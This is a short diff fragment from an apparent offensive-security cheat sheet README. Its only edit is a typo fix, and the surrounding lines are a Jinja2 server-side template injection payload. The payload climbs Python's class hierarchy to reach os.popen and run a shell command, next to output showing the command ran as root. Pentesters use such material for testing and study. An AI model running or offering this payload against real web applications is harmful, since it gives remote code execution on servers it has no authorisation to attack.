akr3ch/CheatSheet/README.md

 uid=0(root) gid=0(root) groups=0(root)
 ```

-* or we can try those above commands also, if the previous one desn't works.
+* or we can try those above commands also, if the previous one doesn't works.

 ```python
 {{ "foo".__class__.__base__.__subclasses__()[182].__init__.__globals__['sys'].modules['os'].popen("id").read()}}